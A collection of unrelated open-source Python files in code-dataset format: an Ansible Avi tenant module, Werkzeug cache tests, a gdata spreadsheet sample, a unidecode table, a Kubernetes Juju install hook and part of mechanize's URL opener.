'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_tenant
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of Tenant Avi RESTful Object
description:
- This module is used to configure Tenant object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
config_settings:
description:
- Tenantconfiguration settings for tenant.
created_by:
description:
- Creator of this tenant.
description:
description:
- User defined description for the object.
local:
description:
- Boolean flag to set local.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
name:
description:
- Name of the object.
required: true
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create Tenant using Service Engines in provider mode
avi_tenant:
controller: ''
password: ''
username: ''
config_settings:
se_in_provider_context: false
tenant_access_to_provider_se: true
tenant_vrf: false
description: VCenter, Open Stack, AWS Virtual services
local: true
name: Demo
'''
RETURN = '''
obj:
description: Tenant (api/tenant) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
config_settings=dict(type='dict',),
created_by=dict(type='str',),
description=dict(type='str',),
local=dict(type='bool',),
name=dict(type='str', required=True),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'tenant',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 |
bakerlover/project2 | lib/werkzeug/testsuite/contrib/cache.py | 94 | 7212 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.cache
~~~~~~~~~~~~~~~~~~~~~~~~
Tests the cache system
:copyright: (c) 2013 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import time
import unittest
import tempfile
import shutil
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.contrib import cache
try:
import redis
try:
from redis.exceptions import ConnectionError as RedisConnectionError
cache.RedisCache(key_prefix='werkzeug-test-case:')._client.set('test','connection')
except RedisConnectionError:
redis = None
except ImportError:
redis = None
try:
import pylibmc as memcache
except ImportError:
try:
from google.appengine.api import memcache
except ImportError:
try:
import memcache
except ImportError:
memcache = None
class SimpleCacheTestCase(WerkzeugTestCase):
def test_get_dict(self):
c = cache.SimpleCache()
c.set('a', 'a')
c.set('b', 'b')
d = c.get_dict('a', 'b')
assert 'a' in d
assert 'a' == d['a']
assert 'b' in d
assert 'b' == d['b']
def test_set_many(self):
c = cache.SimpleCache()
c.set_many({0: 0, 1: 1, 2: 4})
assert c.get(2) == 4
c.set_many((i, i*i) for i in range(3))
assert c.get(2) == 4
class FileSystemCacheTestCase(WerkzeugTestCase):
def test_set_get(self):
tmp_dir = tempfile.mkdtemp()
try:
c = cache.FileSystemCache(cache_dir=tmp_dir)
for i in range(3):
c.set(str(i), i * i)
for i in range(3):
result = c.get(str(i))
assert result == i * i
finally:
shutil.rmtree(tmp_dir)
def test_filesystemcache_prune(self):
THRESHOLD = 13
tmp_dir = tempfile.mkdtemp()
c = cache.FileSystemCache(cache_dir=tmp_dir, threshold=THRESHOLD)
for i in range(2 * THRESHOLD):
c.set(str(i), i)
cache_files = os.listdir(tmp_dir)
shutil.rmtree(tmp_dir)
assert len(cache_files) <= THRESHOLD
def test_filesystemcache_clear(self):
tmp_dir = tempfile.mkdtemp()
c = cache.FileSystemCache(cache_dir=tmp_dir)
c.set('foo', 'bar')
cache_files = os.listdir(tmp_dir)
assert len(cache_files) == 1
c.clear()
cache_files = os.listdir(tmp_dir)
assert len(cache_files) == 0
shutil.rmtree(tmp_dir)
class RedisCacheTestCase(WerkzeugTestCase):
def make_cache(self):
return cache.RedisCache(key_prefix='werkzeug-test-case:')
def teardown(self):
self.make_cache().clear()
def test_compat(self):
c = self.make_cache()
c._client.set(c.key_prefix + 'foo', b'Awesome')
self.assert_equal(c.get('foo'), b'Awesome')
c._client.set(c.key_prefix + 'foo', b'42')
self.assert_equal(c.get('foo'), 42)
def test_get_set(self):
c = self.make_cache()
c.set('foo', ['bar'])
assert c.get('foo') == ['bar']
def test_get_many(self):
c = self.make_cache()
c.set('foo', ['bar'])
c.set('spam', 'eggs')
assert c.get_many('foo', 'spam') == [['bar'], 'eggs']
def test_set_many(self):
c = self.make_cache()
c.set_many({'foo': 'bar', 'spam': ['eggs']})
assert c.get('foo') == 'bar'
assert c.get('spam') == ['eggs']
def test_expire(self):
c = self.make_cache()
c.set('foo', 'bar', 1)
time.sleep(2)
assert c.get('foo') is None
def test_add(self):
c = self.make_cache()
# sanity check that add() works like set()
c.add('foo', 'bar')
assert c.get('foo') == 'bar'
c.add('foo', 'qux')
assert c.get('foo') == 'bar'
def test_delete(self):
c = self.make_cache()
c.add('foo', 'bar')
assert c.get('foo') == 'bar'
c.delete('foo')
assert c.get('foo') is None
def test_delete_many(self):
c = self.make_cache()
c.add('foo', 'bar')
c.add('spam', 'eggs')
c.delete_many('foo', 'spam')
assert c.get('foo') is None
assert c.get('spam') is None
def test_inc_dec(self):
c = self.make_cache()
c.set('foo', 1)
self.assert_equal(c.inc('foo'), 2)
self.assert_equal(c.dec('foo'), 1)
c.delete('foo')
def test_true_false(self):
c = self.make_cache()
c.set('foo', True)
assert c.get('foo') == True
c.set('bar', False)
assert c.get('bar') == False
class MemcachedCacheTestCase(WerkzeugTestCase):
def make_cache(self):
return cache.MemcachedCache(key_prefix='werkzeug-test-case:')
def teardown(self):
self.make_cache().clear()
def test_compat(self):
c = self.make_cache()
c._client.set(c.key_prefix + b'foo', 'bar')
self.assert_equal(c.get('foo'), 'bar')
def test_get_set(self):
c = self.make_cache()
c.set('foo', 'bar')
self.assert_equal(c.get('foo'), 'bar')
def test_get_many(self):
c = self.make_cache()
c.set('foo', 'bar')
c.set('spam', 'eggs')
self.assert_equal(c.get_many('foo', 'spam'), ['bar', 'eggs'])
def test_set_many(self):
c = self.make_cache()
c.set_many({'foo': 'bar', 'spam': 'eggs'})
self.assert_equal(c.get('foo'), 'bar')
self.assert_equal(c.get('spam'), 'eggs')
def test_expire(self):
c = self.make_cache()
c.set('foo', 'bar', 1)
time.sleep(2)
self.assert_is_none(c.get('foo'))
def test_add(self):
c = self.make_cache()
c.add('foo', 'bar')
self.assert_equal(c.get('foo'), 'bar')
c.add('foo', 'baz')
self.assert_equal(c.get('foo'), 'bar')
def test_delete(self):
c = self.make_cache()
c.add('foo', 'bar')
self.assert_equal(c.get('foo'), 'bar')
c.delete('foo')
self.assert_is_none(c.get('foo'))
def test_delete_many(self):
c = self.make_cache()
c.add('foo', 'bar')
c.add('spam', 'eggs')
c.delete_many('foo', 'spam')
self.assert_is_none(c.get('foo'))
self.assert_is_none(c.get('spam'))
def test_inc_dec(self):
c = self.make_cache()
c.set('foo', 1)
# XXX: Is this an intended difference?
c.inc('foo')
self.assert_equal(c.get('foo'), 2)
c.dec('foo')
self.assert_equal(c.get('foo'), 1)
def test_true_false(self):
c = self.make_cache()
c.set('foo', True)
self.assert_equal(c.get('foo'), True)
c.set('bar', False)
self.assert_equal(c.get('bar'), False)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(SimpleCacheTestCase))
suite.addTest(unittest.makeSuite(FileSystemCacheTestCase))
if redis is not None:
suite.addTest(unittest.makeSuite(RedisCacheTestCase))
if memcache is not None:
suite.addTest(unittest.makeSuite(MemcachedCacheTestCase))
return suite
| apache-2.0 |
tmerrick1/spack | lib/spack/spack/test/cmd/cd.py | 5 | 1470 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack.main import SpackCommand
cd = SpackCommand('cd')
def test_cd():
"""Sanity check the cd command to make sure it works."""
out = cd()
assert "To initialize spack's shell commands, you must run one of" in out
| lgpl-2.1 |
jounex/hue | desktop/core/ext-py/boto-2.38.0/boto/fps/__init__.py | 429 | 1101 | # Copyright (c) 2008, Chris Moyer http://coredumped.org
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
| apache-2.0 |
jspraul/bite-project | deps/gdata-python-client/samples/spreadsheets/spreadsheetExample.py | 39 | 6433 | #!/usr/bin/python
#
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'api.laurabeth@gmail.com (Laura Beth Lincoln)'
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
import gdata.spreadsheet.service
import gdata.service
import atom.service
import gdata.spreadsheet
import atom
import getopt
import sys
import string
class SimpleCRUD:
def __init__(self, email, password):
self.gd_client = gdata.spreadsheet.service.SpreadsheetsService()
self.gd_client.email = email
self.gd_client.password = password
self.gd_client.source = 'Spreadsheets GData Sample'
self.gd_client.ProgrammaticLogin()
self.curr_key = ''
self.curr_wksht_id = ''
self.list_feed = None
def _PromptForSpreadsheet(self):
# Get the list of spreadsheets
feed = self.gd_client.GetSpreadsheetsFeed()
self._PrintFeed(feed)
input = raw_input('\nSelection: ')
id_parts = feed.entry[string.atoi(input)].id.text.split('/')
self.curr_key = id_parts[len(id_parts) - 1]
def _PromptForWorksheet(self):
# Get the list of worksheets
feed = self.gd_client.GetWorksheetsFeed(self.curr_key)
self._PrintFeed(feed)
input = raw_input('\nSelection: ')
id_parts = feed.entry[string.atoi(input)].id.text.split('/')
self.curr_wksht_id = id_parts[len(id_parts) - 1]
def _PromptForCellsAction(self):
print ('dump\n'
'update {row} {col} {input_value}\n'
'\n')
input = raw_input('Command: ')
command = input.split(' ', 1)
if command[0] == 'dump':
self._CellsGetAction()
elif command[0] == 'update':
parsed = command[1].split(' ', 2)
if len(parsed) == 3:
self._CellsUpdateAction(parsed[0], parsed[1], parsed[2])
else:
self._CellsUpdateAction(parsed[0], parsed[1], '')
else:
self._InvalidCommandError(input)
def _PromptForListAction(self):
print ('dump\n'
'insert {row_data} (example: insert label=content)\n'
'update {row_index} {row_data}\n'
'delete {row_index}\n'
'Note: No uppercase letters in column names!\n'
'\n')
input = raw_input('Command: ')
command = input.split(' ' , 1)
if command[0] == 'dump':
self._ListGetAction()
elif command[0] == 'insert':
self._ListInsertAction(command[1])
elif command[0] == 'update':
parsed = command[1].split(' ', 1)
self._ListUpdateAction(parsed[0], parsed[1])
elif command[0] == 'delete':
self._ListDeleteAction(command[1])
else:
self._InvalidCommandError(input)
def _CellsGetAction(self):
# Get the feed of cells
feed = self.gd_client.GetCellsFeed(self.curr_key, self.curr_wksht_id)
self._PrintFeed(feed)
def _CellsUpdateAction(self, row, col, inputValue):
entry = self.gd_client.UpdateCell(row=row, col=col, inputValue=inputValue,
key=self.curr_key, wksht_id=self.curr_wksht_id)
if isinstance(entry, gdata.spreadsheet.SpreadsheetsCell):
print 'Updated!'
def _ListGetAction(self):
# Get the list feed
self.list_feed = self.gd_client.GetListFeed(self.curr_key, self.curr_wksht_id)
self._PrintFeed(self.list_feed)
def _ListInsertAction(self, row_data):
entry = self.gd_client.InsertRow(self._StringToDictionary(row_data),
self.curr_key, self.curr_wksht_id)
if isinstance(entry, gdata.spreadsheet.SpreadsheetsList):
print 'Inserted!'
def _ListUpdateAction(self, index, row_data):
self.list_feed = self.gd_client.GetListFeed(self.curr_key, self.curr_wksht_id)
entry = self.gd_client.UpdateRow(
self.list_feed.entry[string.atoi(index)],
self._StringToDictionary(row_data))
if isinstance(entry, gdata.spreadsheet.SpreadsheetsList):
print 'Updated!'
def _ListDeleteAction(self, index):
self.list_feed = self.gd_client.GetListFeed(self.curr_key, self.curr_wksht_id)
self.gd_client.DeleteRow(self.list_feed.entry[string.atoi(index)])
print 'Deleted!'
def _StringToDictionary(self, row_data):
dict = {}
for param in row_data.split():
temp = param.split('=')
dict[temp[0]] = temp[1]
return dict
def _PrintFeed(self, feed):
for i, entry in enumerate(feed.entry):
if isinstance(feed, gdata.spreadsheet.SpreadsheetsCellsFeed):
print '%s %s\n' % (entry.title.text, entry.content.text)
elif isinstance(feed, gdata.spreadsheet.SpreadsheetsListFeed):
print '%s %s %s' % (i, entry.title.text, entry.content.text)
# Print this row's value for each column (the custom dictionary is
# built using the gsx: elements in the entry.)
print 'Contents:'
for key in entry.custom:
print ' %s: %s' % (key, entry.custom[key].text)
print '\n',
else:
print '%s %s\n' % (i, entry.title.text)
def _InvalidCommandError(self, input):
print 'Invalid input: %s\n' % (input)
def Run(self):
self._PromptForSpreadsheet()
self._PromptForWorksheet()
input = raw_input('cells or list? ')
if input == 'cells':
while True:
self._PromptForCellsAction()
elif input == 'list':
while True:
self._PromptForListAction()
def main():
# parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["user=", "pw="])
except getopt.error, msg:
print 'python spreadsheetExample.py --user [username] --pw [password] '
sys.exit(2)
user = ''
pw = ''
key = ''
# Process options
for o, a in opts:
if o == "--user":
user = a
elif o == "--pw":
pw = a
if user == '' or pw == '':
print 'python spreadsheetExample.py --user [username] --pw [password] '
sys.exit(2)
sample = SimpleCRUD(user, pw)
sample.Run()
if __name__ == '__main__':
main()
| apache-2.0 |
Mhynlo/SickRage | lib/unidecode/x08e.py | 252 | 4659 | data = (
'Chu ', # 0x00
'Jing ', # 0x01
'Nie ', # 0x02
'Xiao ', # 0x03
'Bo ', # 0x04
'Chi ', # 0x05
'Qun ', # 0x06
'Mou ', # 0x07
'Shu ', # 0x08
'Lang ', # 0x09
'Yong ', # 0x0a
'Jiao ', # 0x0b
'Chou ', # 0x0c
'Qiao ', # 0x0d
'[?] ', # 0x0e
'Ta ', # 0x0f
'Jian ', # 0x10
'Qi ', # 0x11
'Wo ', # 0x12
'Wei ', # 0x13
'Zhuo ', # 0x14
'Jie ', # 0x15
'Ji ', # 0x16
'Nie ', # 0x17
'Ju ', # 0x18
'Ju ', # 0x19
'Lun ', # 0x1a
'Lu ', # 0x1b
'Leng ', # 0x1c
'Huai ', # 0x1d
'Ju ', # 0x1e
'Chi ', # 0x1f
'Wan ', # 0x20
'Quan ', # 0x21
'Ti ', # 0x22
'Bo ', # 0x23
'Zu ', # 0x24
'Qie ', # 0x25
'Ji ', # 0x26
'Cu ', # 0x27
'Zong ', # 0x28
'Cai ', # 0x29
'Zong ', # 0x2a
'Peng ', # 0x2b
'Zhi ', # 0x2c
'Zheng ', # 0x2d
'Dian ', # 0x2e
'Zhi ', # 0x2f
'Yu ', # 0x30
'Duo ', # 0x31
'Dun ', # 0x32
'Chun ', # 0x33
'Yong ', # 0x34
'Zhong ', # 0x35
'Di ', # 0x36
'Zhe ', # 0x37
'Chen ', # 0x38
'Chuai ', # 0x39
'Jian ', # 0x3a
'Gua ', # 0x3b
'Tang ', # 0x3c
'Ju ', # 0x3d
'Fu ', # 0x3e
'Zu ', # 0x3f
'Die ', # 0x40
'Pian ', # 0x41
'Rou ', # 0x42
'Nuo ', # 0x43
'Ti ', # 0x44
'Cha ', # 0x45
'Tui ', # 0x46
'Jian ', # 0x47
'Dao ', # 0x48
'Cuo ', # 0x49
'Xi ', # 0x4a
'Ta ', # 0x4b
'Qiang ', # 0x4c
'Zhan ', # 0x4d
'Dian ', # 0x4e
'Ti ', # 0x4f
'Ji ', # 0x50
'Nie ', # 0x51
'Man ', # 0x52
'Liu ', # 0x53
'Zhan ', # 0x54
'Bi ', # 0x55
'Chong ', # 0x56
'Lu ', # 0x57
'Liao ', # 0x58
'Cu ', # 0x59
'Tang ', # 0x5a
'Dai ', # 0x5b
'Suo ', # 0x5c
'Xi ', # 0x5d
'Kui ', # 0x5e
'Ji ', # 0x5f
'Zhi ', # 0x60
'Qiang ', # 0x61
'Di ', # 0x62
'Man ', # 0x63
'Zong ', # 0x64
'Lian ', # 0x65
'Beng ', # 0x66
'Zao ', # 0x67
'Nian ', # 0x68
'Bie ', # 0x69
'Tui ', # 0x6a
'Ju ', # 0x6b
'Deng ', # 0x6c
'Ceng ', # 0x6d
'Xian ', # 0x6e
'Fan ', # 0x6f
'Chu ', # 0x70
'Zhong ', # 0x71
'Dun ', # 0x72
'Bo ', # 0x73
'Cu ', # 0x74
'Zu ', # 0x75
'Jue ', # 0x76
'Jue ', # 0x77
'Lin ', # 0x78
'Ta ', # 0x79
'Qiao ', # 0x7a
'Qiao ', # 0x7b
'Pu ', # 0x7c
'Liao ', # 0x7d
'Dun ', # 0x7e
'Cuan ', # 0x7f
'Kuang ', # 0x80
'Zao ', # 0x81
'Ta ', # 0x82
'Bi ', # 0x83
'Bi ', # 0x84
'Zhu ', # 0x85
'Ju ', # 0x86
'Chu ', # 0x87
'Qiao ', # 0x88
'Dun ', # 0x89
'Chou ', # 0x8a
'Ji ', # 0x8b
'Wu ', # 0x8c
'Yue ', # 0x8d
'Nian ', # 0x8e
'Lin ', # 0x8f
'Lie ', # 0x90
'Zhi ', # 0x91
'Li ', # 0x92
'Zhi ', # 0x93
'Chan ', # 0x94
'Chu ', # 0x95
'Duan ', # 0x96
'Wei ', # 0x97
'Long ', # 0x98
'Lin ', # 0x99
'Xian ', # 0x9a
'Wei ', # 0x9b
'Zuan ', # 0x9c
'Lan ', # 0x9d
'Xie ', # 0x9e
'Rang ', # 0x9f
'Xie ', # 0xa0
'Nie ', # 0xa1
'Ta ', # 0xa2
'Qu ', # 0xa3
'Jie ', # 0xa4
'Cuan ', # 0xa5
'Zuan ', # 0xa6
'Xi ', # 0xa7
'Kui ', # 0xa8
'Jue ', # 0xa9
'Lin ', # 0xaa
'Shen ', # 0xab
'Gong ', # 0xac
'Dan ', # 0xad
'Segare ', # 0xae
'Qu ', # 0xaf
'Ti ', # 0xb0
'Duo ', # 0xb1
'Duo ', # 0xb2
'Gong ', # 0xb3
'Lang ', # 0xb4
'Nerau ', # 0xb5
'Luo ', # 0xb6
'Ai ', # 0xb7
'Ji ', # 0xb8
'Ju ', # 0xb9
'Tang ', # 0xba
'Utsuke ', # 0xbb
'[?] ', # 0xbc
'Yan ', # 0xbd
'Shitsuke ', # 0xbe
'Kang ', # 0xbf
'Qu ', # 0xc0
'Lou ', # 0xc1
'Lao ', # 0xc2
'Tuo ', # 0xc3
'Zhi ', # 0xc4
'Yagate ', # 0xc5
'Ti ', # 0xc6
'Dao ', # 0xc7
'Yagate ', # 0xc8
'Yu ', # 0xc9
'Che ', # 0xca
'Ya ', # 0xcb
'Gui ', # 0xcc
'Jun ', # 0xcd
'Wei ', # 0xce
'Yue ', # 0xcf
'Xin ', # 0xd0
'Di ', # 0xd1
'Xuan ', # 0xd2
'Fan ', # 0xd3
'Ren ', # 0xd4
'Shan ', # 0xd5
'Qiang ', # 0xd6
'Shu ', # 0xd7
'Tun ', # 0xd8
'Chen ', # 0xd9
'Dai ', # 0xda
'E ', # 0xdb
'Na ', # 0xdc
'Qi ', # 0xdd
'Mao ', # 0xde
'Ruan ', # 0xdf
'Ren ', # 0xe0
'Fan ', # 0xe1
'Zhuan ', # 0xe2
'Hong ', # 0xe3
'Hu ', # 0xe4
'Qu ', # 0xe5
'Huang ', # 0xe6
'Di ', # 0xe7
'Ling ', # 0xe8
'Dai ', # 0xe9
'Ao ', # 0xea
'Zhen ', # 0xeb
'Fan ', # 0xec
'Kuang ', # 0xed
'Ang ', # 0xee
'Peng ', # 0xef
'Bei ', # 0xf0
'Gu ', # 0xf1
'Ku ', # 0xf2
'Pao ', # 0xf3
'Zhu ', # 0xf4
'Rong ', # 0xf5
'E ', # 0xf6
'Ba ', # 0xf7
'Zhou ', # 0xf8
'Zhi ', # 0xf9
'Yao ', # 0xfa
'Ke ', # 0xfb
'Yi ', # 0xfc
'Qing ', # 0xfd
'Shi ', # 0xfe
'Ping ', # 0xff
)
| gpl-3.0 |
DanaOshri/Open-Knesset | video/management/commands/add_video.py | 14 | 1246 | # encoding: utf-8
from django.core.management.base import NoArgsCommand
from optparse import make_option
from video.management.commands.sub_commands.AddVideo import AddVideo
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--video-link',action='store',dest='video-link',
help="link to the video, use --list-types to see a list of supported link types"),
make_option('--list-types',action='store_true',dest='list-types',
help="list supported video link types and formats"),
make_option('--object-type',action='store',dest='object-type',
help="set the object type, currently only member is supported"),
make_option('--object-id',action='store',dest='object-id',
help="set the object id that the video will be related to"),
make_option('--sticky',action='store_true',dest='is_sticky',
help="set the video as sticky"),
)
def handle_noargs(self, **options):
if options.get('list-types',False):
print """Supported link formats:
youtube - http://www.youtube.com/watch?v=2sASREICzqY"""
else:
av=AddVideo(options)
av.run()
print av.ans
| bsd-3-clause |
sseago/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/install.py | 105 | 3183 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import setup
setup.pre_install()
import subprocess
from charmhelpers.core import hookenv
from charmhelpers import fetch
from charmhelpers.fetch import archiveurl
from path import path
def install():
install_packages()
hookenv.log('Installing go')
download_go()
hookenv.log('Adding kubernetes and go to the path')
strings = [
'export GOROOT=/usr/local/go\n',
'export PATH=$PATH:$GOROOT/bin\n',
'export KUBE_MASTER_IP=0.0.0.0\n',
'export KUBERNETES_MASTER=http://$KUBE_MASTER_IP\n',
]
update_rc_files(strings)
hookenv.log('Downloading kubernetes code')
clone_repository()
hookenv.open_port(8080)
hookenv.log('Install complete')
def download_go():
"""
Kubernetes charm strives to support upstream. Part of this is installing a
fairly recent edition of GO. This fetches the golang archive and installs
it in /usr/local
"""
go_url = 'https://storage.googleapis.com/golang/go1.4.2.linux-amd64.tar.gz'
go_sha1 = '5020af94b52b65cc9b6f11d50a67e4bae07b0aff'
handler = archiveurl.ArchiveUrlFetchHandler()
handler.install(go_url, '/usr/local', go_sha1, 'sha1')
def clone_repository():
"""
Clone the upstream repository into /opt/kubernetes for deployment compilation
of kubernetes. Subsequently used during upgrades.
"""
repository = 'https://github.com/GoogleCloudPlatform/kubernetes.git'
kubernetes_directory = '/opt/kubernetes'
command = ['git', 'clone', repository, kubernetes_directory]
print(command)
output = subprocess.check_output(command)
print(output)
def install_packages():
"""
Install required packages to build the k8s source, and syndicate between
minion nodes. In addition, fetch pip to handle python dependencies
"""
hookenv.log('Installing Debian packages')
# Create the list of packages to install.
apt_packages = ['build-essential', 'git', 'make', 'nginx', 'python-pip']
fetch.apt_install(fetch.filter_installed_packages(apt_packages))
def update_rc_files(strings):
"""
Preseed the bash environment for ubuntu and root with K8's env vars to
make interfacing with the api easier. (see: kubectrl docs)
"""
rc_files = [path('/home/ubuntu/.bashrc'), path('/root/.bashrc')]
for rc_file in rc_files:
lines = rc_file.lines()
for string in strings:
if string not in lines:
lines.append(string)
rc_file.write_lines(lines)
if __name__ == "__main__":
install()
| apache-2.0 |
ppizarror/Hero-of-Antair | bin/mechanize/_opener.py | 3 | 14766 | """URL opener.
Copyright 2004-2006 John J Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import os, urllib2, bisect, httplib, types, tempfile
from _request import Request
import _response
import _rfc3986
import _sockettimeout
import _urllib2_fork
from _util import isstringlike
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
set
except NameError:
import sets
set = sets.Set
open_file = open
class ContentTooShortError(urllib2.URLError):
def __init__(self, reason, result):
urllib2.URLError.__init__(self, reason)
self.result = result
def set_request_attr(req, name, value, default):
try:
getattr(req, name)
except AttributeError:
setattr(req, name, default)
if value is not default:
setattr(req, name, value)
class OpenerDirector(_urllib2_fork.OpenerDirector):
def __init__(self):
_urllib2_fork.OpenerDirector.__init__(self)
# really none of these are (sanely) public -- the lack of initial
# underscore on some is just due to following urllib2
self.process_response = {}
self.process_request = {}
self._any_request = {}
self._any_response = {}
self._handler_index_valid = True
self._tempfiles = []
def add_handler(self, handler):
if not hasattr(handler, "add_parent"):
raise TypeError("expected BaseHandler instance, got %r" %
type(handler))
if handler in self.handlers:
return
# XXX why does self.handlers need to be sorted?
bisect.insort(self.handlers, handler)
handler.add_parent(self)
self._handler_index_valid = False
def _maybe_reindex_handlers(self):
if self._handler_index_valid:
return
handle_error = {}
handle_open = {}
process_request = {}
process_response = {}
any_request = set()
any_response = set()
unwanted = []
for handler in self.handlers:
added = False
for meth in dir(handler):
if meth in ["redirect_request", "do_open", "proxy_open"]:
# oops, coincidental match
continue
if meth == "any_request":
any_request.add(handler)
added = True
continue
elif meth == "any_response":
any_response.add(handler)
added = True
continue
ii = meth.find("_")
scheme = meth[:ii]
condition = meth[ii+1:]
if condition.startswith("error"):
jj = meth[ii+1:].find("_") + ii + 1
kind = meth[jj+1:]
try:
kind = int(kind)
except ValueError:
pass
lookup = handle_error.setdefault(scheme, {})
elif condition == "open":
kind = scheme
lookup = handle_open
elif condition == "request":
kind = scheme
lookup = process_request
elif condition == "response":
kind = scheme
lookup = process_response
else:
continue
lookup.setdefault(kind, set()).add(handler)
added = True
if not added:
unwanted.append(handler)
for handler in unwanted:
self.handlers.remove(handler)
# sort indexed methods
# XXX could be cleaned up
for lookup in [process_request, process_response]:
for scheme, handlers in lookup.iteritems():
lookup[scheme] = handlers
for scheme, lookup in handle_error.iteritems():
for code, handlers in lookup.iteritems():
handlers = list(handlers)
handlers.sort()
lookup[code] = handlers
for scheme, handlers in handle_open.iteritems():
handlers = list(handlers)
handlers.sort()
handle_open[scheme] = handlers
# cache the indexes
self.handle_error = handle_error
self.handle_open = handle_open
self.process_request = process_request
self.process_response = process_response
self._any_request = any_request
self._any_response = any_response
def _request(self, url_or_req, data, visit,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
if isstringlike(url_or_req):
req = Request(url_or_req, data, visit=visit, timeout=timeout)
else:
# already a mechanize.Request instance
req = url_or_req
if data is not None:
req.add_data(data)
# XXX yuck
set_request_attr(req, "visit", visit, None)
set_request_attr(req, "timeout", timeout,
_sockettimeout._GLOBAL_DEFAULT_TIMEOUT)
return req
def open(self, fullurl, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
req = self._request(fullurl, data, None, timeout)
req_scheme = req.get_type()
self._maybe_reindex_handlers()
# pre-process request
# XXX should we allow a Processor to change the URL scheme
# of the request?
request_processors = set(self.process_request.get(req_scheme, []))
request_processors.update(self._any_request)
request_processors = list(request_processors)
request_processors.sort()
for processor in request_processors:
for meth_name in ["any_request", req_scheme+"_request"]:
meth = getattr(processor, meth_name, None)
if meth:
req = meth(req)
# In Python >= 2.4, .open() supports processors already, so we must
# call ._open() instead.
urlopen = _urllib2_fork.OpenerDirector._open
response = urlopen(self, req, data)
# post-process response
response_processors = set(self.process_response.get(req_scheme, []))
response_processors.update(self._any_response)
response_processors = list(response_processors)
response_processors.sort()
for processor in response_processors:
for meth_name in ["any_response", req_scheme+"_response"]:
meth = getattr(processor, meth_name, None)
if meth:
response = meth(req, response)
return response
def error(self, proto, *args):
if proto in ['http', 'https']:
# XXX http[s] protocols are special-cased
dict = self.handle_error['http'] # https is not different than http
proto = args[2] # YUCK!
